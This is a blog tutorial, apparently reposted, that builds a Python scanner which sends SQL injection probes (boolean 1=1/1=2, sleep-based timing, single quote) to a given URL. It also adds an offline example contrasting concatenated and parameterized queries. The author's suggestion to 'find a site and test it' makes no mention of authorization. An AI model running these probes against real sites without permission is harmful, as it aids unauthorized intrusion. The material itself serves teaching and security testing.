  • Python: Writing a MySQL Injection Vulnerability Detection Tool

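    There are several ways to tell whether a MySQL-backed website has an injection vulnerability:

    1. Appending a single quote after the injection point causes an error
    2. and 1=1 returns the normal page, while and 1=2 returns a page that differs from the normal one
    3. and sleep(3) makes the page wait for about 3 seconds

    From how the returned page behaves, we can tell whether an injection vulnerability exists

    To check whether the returned pages are the same, we can compare the Content-Length value in the response headers

    With that in mind, we can write a simple Python script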

    # -*- coding:utf-8 -*-
    __author__ = "MuT6 Sch01aR"
    
    import requests
    import argparse
    import time
    
    # Without a timeout, requests can block forever; must exceed the sleep(5) delay
    TIMEOUT = 15
    
    def argparse_option():
        parser = argparse.ArgumentParser(description='The Help of Mysql_Inject.py')
        parser.add_argument('-u','--url',help='The Url To Check')
        args = parser.parse_args()
        return args
    
    def body_length(r):
        # Content-Length is missing on chunked responses (None == None would
        # compare equal), so fall back to the size of the received body
        h = r.headers.get('Content-Length')
        return int(h) if h is not None else len(r.content)
    
    def way_1(url):
        # Boolean check: "and 1=1" should match the normal page, "and 1=2" should not
        payload = [' and 1=1',' and 1=2']
        url_1 = url+payload[0]
        url_2 = url+payload[1]
        r = requests.get(url=url, timeout=TIMEOUT)
        r_1 = requests.get(url=url_1, timeout=TIMEOUT)
        r_2 = requests.get(url=url_2, timeout=TIMEOUT)
        h = body_length(r)
        h_1 = body_length(r_1)
        h_2 = body_length(r_2)
        if h == h_1 and h != h_2:
            print("[*] %s can be injected" %url)
        else:
            way_2(url)
    
    def way_2(url):
        # Time-based check: a response delayed by more than 5 seconds means sleep(5) ran
        payload = ' and sleep(5)'
        t1 = time.time()
        requests.get(url=url+payload, timeout=TIMEOUT)
        t2 = time.time()
        if t2-t1 > 5:
            print("[*] %s can be injected" %url)
        else:
            way_3(url)
    
    def way_3(url):
        # Single-quote check: an error page has a different length from the normal page
        payload = "'"
        url_1 = url+payload
        r = requests.get(url=url, timeout=TIMEOUT)
        r_1 = requests.get(url=url_1, timeout=TIMEOUT)
        h = body_length(r)
        h_1 = body_length(r_1)
        if h != h_1:
            print("[*] %s can be injected" % url)
        else:
            print("[!] %s can't be injected" %url)
    
    if __name__ == '__main__':
        cmd_args = argparse_option()
        url = cmd_args.url
        if url:
            way_1(url)
        else:
            print("Usage:python3 main.py -u [url]")
    

    Find a site and test it

    For now this script can only check simple links; it cannot yet handle links with multiple parameters
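
Why checks 1 and 2 in the list at the top fire, as an added example (not the original author's code): a hypothetical page handler that concatenates its id parameter into SQL, beside the same handler with a bound parameter. SQLite stands in for MySQL so the block runs offline (an assumption; the sleep() check is left out because SQLite has no such function), and the table, rows and function names are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite is a stand-in for MySQL (assumption)
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "first post"), (2, "second post")])
    return db

def render(rows):
    # Minimal page body: the title if a row matched, otherwise an empty heading
    return "<h1>%s</h1>" % (rows[0][0] if rows else "")

def page_vulnerable(db, id_param):
    """Hypothetical handler that builds SQL by string concatenation."""
    try:
        sql = "SELECT title FROM news WHERE id = " + id_param
        return render(db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc  # verbose error page, as in check 1

def page_parameterized(db, id_param):
    """Same handler with a bound parameter: the input is data, never SQL."""
    try:
        sql = "SELECT title FROM news WHERE id = ?"
        return render(db.execute(sql, (id_param,)).fetchall())
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc

def signals(page, db, value="1"):
    """Apply check 1 (quote error) and check 2 (1=1 vs 1=2 body length)."""
    base = len(page(db, value))
    true_len = len(page(db, value + " and 1=1"))
    false_len = len(page(db, value + " and 1=2"))
    return {
        "boolean": base == true_len and base != false_len,
        "quote_error": "SQL error" in page(db, value + "'"),
    }

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", signals(page_vulnerable, db))
    print("parameterized:", signals(page_parameterized, db))
```

With the bound parameter, the appended text never reaches the SQL parser, so neither signal appears.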

  • Original article: https://www.cnblogs.com/sch01ar/p/8424800.html